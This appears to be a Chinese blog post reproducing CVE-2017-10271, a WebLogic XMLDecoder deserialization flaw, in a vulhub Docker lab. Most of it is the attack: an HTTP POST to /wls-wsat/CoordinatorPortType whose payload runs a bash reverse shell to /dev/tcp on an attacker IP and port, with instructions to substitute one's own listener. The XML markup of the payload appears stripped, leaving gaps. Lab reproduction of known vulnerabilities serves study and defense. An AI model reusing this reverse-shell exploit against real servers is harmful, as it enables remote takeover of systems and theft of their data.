CVE-2017-10271(Weblogic 小于 10.3.6 wls-wsat XMLDecoder 反序列化漏洞)复现

漏洞详情

Oracle Fusion Middleware中的Oracle WebLogic Server组件的WLS Security子组件存在安全漏洞。使用精心构造的xml数据可能造成任意代码执行,攻击者只需要发送精心构造的 HTTP 请求,就可以拿到目标服务器的权限。攻击者可利用该漏洞控制组件,影响数据的可用性、保密性和完整性。

复现过程

一:利用vulhub搭建环境
1、进入对应漏洞(CVE-2017-10271)目录下

cd /vulhub/weblogic/CVE-2017-10271/

2、搭建环境

docker-compose up -d

3、访问ip:port
CVE-2017-10271(Weblogic 小于 10.3.6 wls-wsat XMLDecoder 反序列化漏洞)复现_第1张图片

二:攻击

1.监听一个端口
CVE-2017-10271(Weblogic 小于 10.3.6 wls-wsat XMLDecoder 反序列化漏洞)复现_第2张图片
2.在地址后加 /wls-wsat/CoordinatorPortType抓包,设置payload。

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host:192.168.33.137:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 639

 





/bin/bash


-c


bash -i >& /dev/tcp/192.168.33.138/4444 0>&1








CVE-2017-10271(Weblogic 小于 10.3.6 wls-wsat XMLDecoder 反序列化漏洞)复现_第3张图片
将框内的ip和端口换成你的ip地址和监听的端口
4、go,成功
CVE-2017-10271(Weblogic 小于 10.3.6 wls-wsat XMLDecoder 反序列化漏洞)复现_第4张图片

你可能感兴趣的:(漏洞复现,CVE-2017-10271,Weblogic,小于,10.3.6,wls-wsat,XMLDeco)